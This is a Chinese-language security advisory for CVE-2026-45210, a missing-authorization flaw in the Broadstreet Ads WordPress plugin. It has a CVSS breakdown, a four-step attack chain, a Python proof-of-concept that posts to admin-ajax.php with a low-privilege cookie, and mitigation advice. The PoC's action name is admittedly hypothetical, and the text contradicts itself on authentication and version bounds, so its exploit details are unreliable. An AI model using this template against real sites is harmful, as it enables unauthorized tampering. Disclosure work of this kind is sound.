CVE-2026-45210 Broadstreet Ads越权漏洞

漏洞信息

漏洞编号

CVE-2026-45210

漏洞类型

权限缺失

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Broadstreet Ads

漏洞概述

Broadstreet Ads插件被披露存在缺失授权漏洞，该问题源于访问控制安全级别配置错误。未经授权的攻击者可以利用此漏洞绕过系统的权限验证机制，执行本应受限制的操作。此漏洞影响Broadstreet Ads从n/a到1.52.2及之前的所有版本。CVSS评分为5.4，属于中危严重等级，建议管理员尽快检查并更新插件以确保安全。

技术细节

该漏洞属于典型的访问控制失效漏洞，具体原因为缺失授权检查。在Broadstreet Ads插件的代码逻辑中，某些用于处理广告配置或管理的敏感端点未正确实施权限校验机制。根据CVSS 3.1向量分析，该漏洞利用难度低，且无需用户交互。攻击者只需注册一个低权限账户，即可通过网络向服务器发送恶意请求。由于后端未能区分普通用户与管理员权限，攻击者可成功调用敏感接口，导致广告数据被篡改或服务异常，虽然未造成机密性泄露，但对完整性和可用性造成了影响。

攻击链分析

STEP 1

侦察

攻击者识别目标网站是否安装了Broadstreet Ads插件，并确认其版本是否在1.52.2及以下。

STEP 2

获取低权限账号

攻击者在目标WordPress站点注册一个普通用户账户（订阅者或贡献者级别），满足PR:L条件。

STEP 3

构造恶意请求

攻击者利用抓包工具分析插件逻辑，找到未授权的API端点，并构造包含恶意参数的POST请求。

STEP 4

执行攻击

使用低权限账户的Cookie发送该请求，服务器因缺少权限验证而执行操作，导致数据篡改。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Exploit Title: Broadstreet Ads < 1.52.2 - Missing Authorization PoC
# Date: 2026-05-12
# Exploit Author: Analyst
# Vendor Homepage: https://broadstreetads.com

# Configuration
target_url = "http://example.com/wp-admin/admin-ajax.php"
attacker_cookies = {
    "wordpress_logged_in_xxx": "low_privilege_user_session"
}

# Vulnerable payload attempting to modify settings without admin rights
payload = {
    "action": "broadstreet_action", # Hypothetical vulnerable action
    "params": "{\"setting\": \"malicious_value\"}"
}

try:
    response = requests.post(target_url, data=payload, cookies=attacker_cookies, timeout=10)
    
    if response.status_code == 200 and "success" in response.text:
        print("[+] Exploit successful! Authorization bypassed.")
    else:
        print("[-] Exploit failed or patch applied.")
        
except Exception as e:
    print(f"Error: {e}")

影响范围

Broadstreet Ads <= 1.52.2

防御指南

临时缓解措施

如果无法立即升级，建议暂时禁用Broadstreet Ads插件。或者在服务器层面（如Nginx/Apache配置文件）限制对`/wp-content/plugins/broadstreet/`目录的访问，或者仅允许可信的IP地址访问管理后台，以减少被攻击的风险。